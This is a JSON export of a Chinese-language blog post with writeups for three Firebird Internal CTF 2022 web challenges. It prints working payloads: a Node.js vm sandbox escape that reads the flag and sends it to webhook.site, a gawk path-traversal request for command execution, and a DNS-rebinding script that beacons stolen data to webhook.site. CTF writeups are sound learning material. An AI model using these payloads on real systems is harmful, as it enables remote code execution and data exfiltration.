{"id":163,"date":"2022-01-30T12:50:02","date_gmt":"2022-01-30T04:50:02","guid":{"rendered":"https:\/\/laciatype005.com\/?p=163"},"modified":"2022-01-31T12:46:48","modified_gmt":"2022-01-31T04:46:48","slug":"firebird-internal-ctf-2022-writeups","status":"publish","type":"post","link":"https:\/\/laciatype005.com\/?p=163","title":{"rendered":"Firebird Internal CTF 2022 Writeups"},"content":{"rendered":"\n

\u8bb0\u5f55\u4e00\u4e0b\u5176\u4e2d\u51e0\u9053\u9898\u91cc\u5b66\u5230\u7684\u4e1c\u897f<\/p>\n\n\n\n

\u6bd4\u8d5b\u7f51\u5740\uff1ahttps:\/\/burnt.firebird.sh\/challenges <\/a><\/p>\n\n\n\n

\n\n\n\n

Payload Collector \uff085 solves\uff09<\/h2>\n\n\n\n
\"\"
\u76ee\u6807\u622a\u56fe<\/figcaption><\/figure><\/div>\n\n\n\n
const express = require('express');\nconst path = require('path');\nconst vm = require('vm');\nconst FLAG = require('.\/flag');\n\nconst app = express();\n\napp.set('views', path.join(__dirname, 'views'));\napp.set('view engine', 'pug');\n\napp.use(express.static(path.join(__dirname, 'public')));\n\napp.get('\/', function(req, res, next) {\n\tlet output = '';\n\tconst code = req.query.code + '';\n\n\tif (code) {\n\t\ttry {\n\t\t\tconst result = vm.runInNewContext(`(function () { return ${code}; \/* ${FLAG} *\/ })()`, Object.create(null), {timeout:100});\n\t\t\toutput = result + '';\n\t\t\tif (output.includes('firebird')) {\n\t\t\t\toutput = 'Error: go away hackers';\n\t\t\t}\n\t\t}\n\t\tcatch (e) {\n\t\t\toutput = 'Error: some errors occured';\n\t\t}\n\t}\n\telse {\n\t\toutput = 'Error: invalid code';\n\t}\n\tres.render('index', {title:'Payload Collector', output});\n});\n\napp.get('\/source', function(req, res) {\n\tres.sendFile(path.join(__dirname, 'app.js'));\n  });\n\nmodule.exports = app;<\/code><\/code><\/pre>\n\n\n\n
\u76ee\u6807\u662f\u4e00\u4e2aNode.js\u670d\u52a1\uff0c\u6211\u4eec\u8f93\u5165\u7684\u4ee3\u7801\u88ab\u653e\u5230\u4e86vm\u6a21\u5757\u91cc\u9762\u8fd0\u884c<\/p>\n\n\n\n
const result = vm.runInNewContext(`(function () { return ${code}; \/* ${FLAG} *\/ })()`,Object.create(null), {timeout:100});<\/code><\/p>\n\n\n\n
\u76ee\u6807\u89e3\u6cd5\u5176\u5b9e\u5f88\u7b80\u5355\uff0c\u5229\u7528Node.js \u7684\u7279\u6027\u53ef\u4ee5\u83b7\u5f97\u5f53\u524d\u51fd\u6570\u5185\u5bb9<\/p>\n\n\n\n
arguments.callee.toString().substr(70)<\/code><\/p>\n\n\n\n
\"\"<\/figure><\/div>\n\n\n\n
\u4e0d\u8fc7\u6211\u4e0d\u719f\u6089Node.js\uff0c\u89e3\u9898\u7684\u65f6\u5019\u5b8c\u5168\u88ab\u8fd9\u4e2avm\u5438\u5f15\u8d70\u4e86\uff0c\u4e8e\u662f\u53bb\u627e\u4e86\u4e00\u5806vm escape\u7684\u65b9\u6cd5\u3002\u5947\u602a\u7684\u662f\u5f88\u591a\u6559\u7a0b\u91cc\u7684\u65b9\u6cd5\u90fd\u4e0d\u7ba1\u7528\uff0c\u6700\u540e\u8fd8\u662f\u5728\u8fd9\u91cc<\/a>\u627e\u5230\u4e86\u4e00\u4e2a\u53ef\u7528\u7684\u65b9\u6cd5\u3002<\/p>\n\n\n\n
\u6700\u7ec8payload\uff1a<\/p>\n\n\n\n
new Proxy({}, {\n    get: function(me, key) { (arguments.callee.caller.constructor(`\n        console.log(process);\n        var require = process.mainModule.constructor._load;\n        const http = require('http');\n        http.get({hostname: 'webhook.site',port: 80,path: '\/354c545b-c8c0-4204-9f00-5fe570c0e5d9?a=1',agent: false}); \n        const flag = require('.\/flag');\n        http.get({hostname: 'webhook.site',port: 80,path: \"\/354c545b-c8c0-4204-9f00-5fe570c0e5d9?a=1\"+flag,agent: false}); \n    `))() }\n});<\/code><\/code><\/pre>\n\n\n\n
\u7b80\u5355\u6765\u8bf4\u5c31\u662f\u5b57\u7b26\u4e32\u91cc\u7684function\u4f1a\u5728\u58f0\u660e\u7684\u65f6\u5019evaluate\u4e00\u6b21\uff0c\u800c\u4e14\u662f\u5728global\u4e0b\uff0c\u6240\u4ee5\u5c31\u662fRCE\u4e86<\/p>\n\n\n\n
\n\n\n\n
Sherver2 \uff082 solves\uff09<\/h2>\n\n\n\n
\u57fa\u4e8e\u8fd9\u4e2a\u5e93<\/a>\u7684\u4e00\u4e2aweb\u670d\u52a1\u5668\uff0c\u672c\u8eab\u5c31\u5168\u662f\u6f0f\u6d1e\u3002\u76ee\u6807\u662fRCE\uff0c\u653b\u51fb\u5165\u53e3\u5728\u8fd9\u91cc<\/a>\u3002<\/p>\n\n\n\n
function run_script()\n{\n\tcd 'scripts'\n\tparse_url \"${1:-$REQUEST_URL}\"\n\tlocal -r script=\"${URL_BASE:1}\"\n\t# test if file exists, is a file, and is runnable\n\tif [ ! -e \"$script\" ] || [ ! -f \"$script\" ] || [ ! -x \"$script\" ]; then\n\t\tsend_error 404\n\tfi\n\n\t\".\/$script\" \"${1:-$REQUEST_URL}\" || send_error 500\n}\nexport -f run_script<\/code><\/code><\/pre>\n\n\n\n
\u53ea\u8981\u77e5\u9053gawk\u7684\u4f7f\u7528\u5f88\u5bb9\u6613\u5c31\u53ef\u4ee5\u89e3\u51fa\u6765\uff0cpayload\u5982\u4e0b<\/p>\n\n\n\n
GET \"..\/usr\/bin\/gawk?\"{system($1)} HTTP\/1.1<\/code><\/code><\/pre>\n\n\n\n
\"\"
\u5b9e\u9645\u6267\u884c<\/figcaption><\/figure><\/div>\n\n\n\n
\n\n\n\n
Vulplagiarize (2 solves)<\/h2>\n\n\n\n
\u8fd9\u662f\u4e00\u4e2a\u4f1a\u5e2e\u4f60\u5c06\u8f93\u5165\u7f51\u7ad9\u622a\u5c4f\u7136\u540e\u6a21\u7cca\u5316\u7684\u670d\u52a1<\/p>\n\n\n\n
@app.route('\/flag')\ndef flag():\n    if request.remote_addr == '127.0.0.1':\n        return message(FLAG)\n    return message(\"allow only from local\")\n    \n@app.route('\/', methods=['GET'])\ndef index():\n    return render_template('index.html')\n\n@app.route('\/submit', methods=['GET'])\ndef submit():\n    path = 'static\/images\/%s.png' % uuid.uuid4().hex\n    url  = request.args.get('url')\n    if url:\n        # avoid hackers\n        if not url.startswith('http:\/\/') and not url.startswith('https:\/\/'):\n            return message(msg='malformed url')\n\n        # access url\n        try:\n            driver.get(url)\n            data = driver.get_screenshot_as_png()\n        except common.exceptions.WebDriverException as e:\n            return message(msg=str(e))\n\n        # save result\n        img = Image.open(io.BytesIO(data))\n        img = img.resize((64,64), resample=Image.BILINEAR)\n        img = img.resize((1920,1080), Image.NEAREST)\n        img.save(path)\n        \n        return message(msg=path)\n    else:\n        return message(msg=\"url not found :(\")<\/code><\/code><\/pre>\n\n\n\n
\u8fd9\u91cc\u9700\u8981\u7ed5\u8fc7\u7684\u5c31\u662frequest.remote_addr == '127.0.0.1'<\/code><\/p>\n\n\n\n
\u53ef\u4ee5\u5229\u7528DNS rebinding\u7ed5\u8fc7CORS\uff08\u867d\u7136\u6211\u6ca1\u6210\u529f\uff09<\/p>\n\n\n\n
<script><\/code>function x(){\n  fetch(\"http:\/\/00000000.xxxxxxxx.rbndr.us:8000\/flag\").then(e= e.text()).then(e=navigator.sendBeacon(\"https:\/\/webhook.site\/<webhook>\",e));\n  setTimeout(\"x()\",20000);\n}\nx();<\/code><\/script><\/code><\/code><\/pre>\n\n\n\n
\n","protected":false},"excerpt":{"rendered":"
\u8bb0\u5f55\u4e00\u4e0b\u5176\u4e2d\u51e0\u9053\u9898\u91cc\u5b66\u5230\u7684\u4e1c\u897f \u6bd4\u8d5b\u7f51\u5740\uff1ahttps:\/\/burnt.firebird.sh\/challeng … \u9605\u8bfb\u66f4\u591a<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7,1],"tags":[9],"class_list":["post-163","post","type-post","status-publish","format-standard","hentry","category-ctfs","category-uncategorized","tag-writeups"],"_links":{"self":[{"href":"https:\/\/laciatype005.com\/index.php?rest_route=\/wp\/v2\/posts\/163","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/laciatype005.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/laciatype005.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/laciatype005.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/laciatype005.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=163"}],"version-history":[{"count":14,"href":"https:\/\/laciatype005.com\/index.php?rest_route=\/wp\/v2\/posts\/163\/revisions"}],"predecessor-version":[{"id":199,"href":"https:\/\/laciatype005.com\/index.php?rest_route=\/wp\/v2\/posts\/163\/revisions\/199"}],"wp:attachment":[{"href":"https:\/\/laciatype005.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=163"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/laciatype005.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=163"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/laciatype005.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=163"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}